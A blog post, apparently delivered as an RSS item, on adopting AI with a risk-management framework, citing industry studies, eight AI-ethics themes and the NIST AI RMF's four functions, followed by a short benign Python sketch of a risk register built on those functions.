src="https://www.youtube.com/embed/JsbgGJ85yhU?modestbranding=1&rel=0&cc_load_policy=1&iv_load_policy=3&controls=0&disablekb=1" width="560" height="315" frameborder="0" allow="fullscreen" loading="lazy" title="Artificial Intelligence Risk Management"></iframe></div>
</div></div><div data-element-id="elm_8dlhflOUTY6sHqucmVUUfg" data-element-type="text" class="zpelement zpelem-text "><style> [data-element-id="elm_8dlhflOUTY6sHqucmVUUfg"].zpelem-text { border-radius:1px; } </style><div class="zptext zptext-align-center " data-editor="true"><div><div style="text-align:left;"><div><div><div><div><div style="line-height:1.2;"><div><span style="font-size:14px;">Are you looking to adopt Artificial Intelligence in your organization? Do you have a risk management framework in place?</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">According to&nbsp;</span><a href="https://www.pwc.com/gx/en/issues/data-and-analytics/publications/artificial-intelligence-study.html" target="_blank" style="font-size:14px;text-align:center;">PwC’s Global Artificial Intelligence Study</a><span style="text-align:justify;font-size:14px;">, the potential contribution of artificial intelligence to the global economy by 2030 is as high as 15.7 trillion US dollars. And according to&nbsp;</span><a href="https://www.mckinsey.com/capabilities/quantumblack/our-insights/the-state-of-ai-in-2022-and-a-half-decade-in-review" target="_blank" style="font-size:14px;text-align:center;">McKinsey</a><span style="text-align:justify;font-size:14px;">, AI adoption has more than doubled since 2017. However, it has plateaued between 50 and 60 percent for the past few years. 
The number of AI capabilities in use, such as natural-language generation and computer vision, has also doubled.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">McKinsey has found that, while AI use has increased, risk mitigation to bolster digital trust has remained concerningly consistent since 2019.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">Today, there is a lot of fear, uncertainty, and doubt. Still, Artificial Intelligence is not even close to delivering a superintelligence, but highly specialized systems, what we call narrow AI, are transforming entire industries.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">A portfolio approach can help companies successfully unleash the power of machine intelligence. And a well-balanced portfolio will include some quick wins, focused, for example, on the optimization of a touch-point, and some long-term projects transforming end-to-end processes.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">The quick wins won’t transform your business, but they expose staff to the benefits and opportunities AI presents, and build confidence and momentum with key stakeholders like the board and management. 
For example, a quick win could involve a tool to schedule internal meetings, which allows you to use off-the-shelf packages, while you simultaneously build capability in areas such as hiring and training staff, large-scale data gathering, processing, and labeling.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">Training staff and gaining AI capabilities over time is important, but to reduce risk and drive some momentum, we suggest that, instead of front-loading your costs, you scale them slowly and consistently, making use of off-the-shelf solutions (with suitable adaptations) to help keep costs manageable.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">Data is without a doubt the key to machine learning projects, and the virtuous cycle of data collection means the rich get richer. So, a key risk of this new wave of transformation is the concentration of power in the hands of a few platforms. Knowing where to place your bets depends on access to data that gives your business a competitive advantage. However, issues related to bias and potential misuse will be amplified if leaders have little or no understanding of how algorithms are built.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">Misconceptions can also be costly, with several studies suggesting that product-related AI innovation still struggles to deliver value. Knowing where to place innovation bets is less risky when management understands what types of innovations produce the best returns.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">Misconceptions also occur in regard to what to centralize and why, and the related operating model choices. 
An AI Era business looks very different from an Internet Era one, and this transformation requires a considered approach and AI knowledge. The product-innovation focus and incrementality of the agile internet companies are replaced by strategic data acquisition, unified data platforms, end-to-end process automation, and the adoption of new roles within the business.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">Another misconception relates to expected job losses. Overall job numbers are likely to remain about the same, but a rebalancing of roles will occur, and you should expect fewer managerial roles as you scale AI within the organization.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">Many of the best-performing Machine Learning models are highly opaque. Explainable AI is becoming a key requirement and is in high demand. Machine Learning requires its own governance frameworks, with key lines of defense established right up front.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">In addition, AI presents major ethical concerns related to privacy, bias, and discrimination. 
An organization must define the principles guiding its AI initiatives, ensuring they align with its values, industry, culture, geography, and other factors.</span></div><div><span style="font-size:14px;text-align:justify;"><br></span></div><div><span style="font-size:14px;text-align:justify;">A&nbsp;</span><a href="https://dash.harvard.edu/bitstream/handle/1/42160420/HLS%20White%20Paper%20Final_v3.pdf" target="_blank" style="font-size:14px;text-align:center;">2020 global report from Harvard University</a><span style="font-size:14px;text-align:justify;">&nbsp;evaluated 36 AI Ethics Frameworks from big companies, standards bodies, industry coalitions, and governments to identify eight common themes related to AI Ethics that you should consider:</span></div><span style="font-size:14px;"><ol><ol><li>Privacy,</li><li>Accountability,</li><li>Safety and security,</li><li>Transparency and explainability,</li><li>Fairness and non-discrimination,</li><li>Human control of technology,</li><li>Professional responsibility, and</li><li>Promotion of human values.</li></ol></ol><div><br></div><span style="text-align:justify;"><div>AI presents tremendous opportunity, but also high risks. The right risk management approach is critical, as the perils presented by AI differ significantly from previous waves of digital transformation.</div><div><br></div><div>A solid&nbsp;<a href="https://nvlpubs.nist.gov/nistpubs/ai/NIST.AI.100-1.pdf" target="_blank" style="text-align:center;">AI Risk Management Framework</a>&nbsp;enables dialogue, understanding, and activities to manage AI risks, and responsibly develop trustworthy AI systems. 
It should address four functions:</div></span><ol><ol><li>Govern,</li><li>Map,</li><li>Measure, and</li><li>Manage.</li></ol></ol><span style="text-align:justify;"><div><br></div><div>Each function is broken down into specific actions and outcomes.</div></span><div><br></div><span style="text-align:justify;"><div>If you enjoyed this article, subscribe so that we can share with you Artificial Intelligence Risk Management approaches and frameworks. We’ll help you identify what you should prioritize now, next, and later.&nbsp;</div></span><div><br></div><span style="text-align:justify;"><div>Stay human!</div></span></span><div><a href="https://www.nownextlater.ai/inesdecastroalmeida.html" target="_blank"><span style="font-size:14px;">Inês<br></span></a><br></div></div></div></div></div></div></div></div></div>
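To make the four functions above concrete, here is a minimal sketch of how an organization might encode them as a simple risk register. The structure, example activities, and function names shown as dictionary keys are illustrative paraphrases, not quotations from the NIST framework.

```python
# Illustrative sketch: the four NIST AI RMF functions as a risk register.
# Example activities are paraphrased for illustration only.

AI_RMF = {
    "Govern":  ["Assign accountability for AI risk", "Publish AI principles"],
    "Map":     ["Inventory AI systems and their contexts", "Identify impacted groups"],
    "Measure": ["Track bias and robustness metrics", "Log performance drift"],
    "Manage":  ["Prioritize and treat identified risks", "Define incident response"],
}

def register_entry(system: str, function: str, activity: str, status: str = "open"):
    """Create one risk-register row, validating against the four functions."""
    if function not in AI_RMF:
        raise ValueError(f"Unknown RMF function: {function}")
    return {"system": system, "function": function,
            "activity": activity, "status": status}

def open_items(register):
    """List register entries that still need attention."""
    return [entry for entry in register if entry["status"] == "open"]
```

A register like this gives each function a concrete, auditable action list, which is the spirit of "each function is broken down into specific actions and outcomes."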
</div><div data-element-id="elm_0eEouQoYoybFxb6V7ynsEA" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_0eEouQoYoybFxb6V7ynsEA"] .zpimage-container figure img { width: 500px ; height: 500.00px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_0eEouQoYoybFxb6V7ynsEA"] .zpimage-container figure img { width:500px ; height:500.00px ; } } @media (max-width: 767px) { [data-element-id="elm_0eEouQoYoybFxb6V7ynsEA"] .zpimage-container figure img { width:500px ; height:500.00px ; } } [data-element-id="elm_0eEouQoYoybFxb6V7ynsEA"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-medium zpimage-tablet-fallback-medium zpimage-mobile-fallback-medium "><figure role="none" class="zpimage-data-ref"><a class="zpimage-anchor" href="/responsible-ai-in-the-age-of-generative-models-ai-governance-ethics-and-risk-management" target="" rel=""><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Navy%20and%20Blue%20Modern%20We%20Provide%20Business%20Solutions%20Facebook%20Ad%20-1200%20x%201200%20px-.png" width="500" height="500.00" loading="lazy" size="medium" alt="AI Governance Book"/></picture></a></figure></div>
</div></div></div></div></div></div> ]]></content:encoded><pubDate>Sun, 02 Jul 2023 02:39:36 +1000</pubDate></item></channel></rss>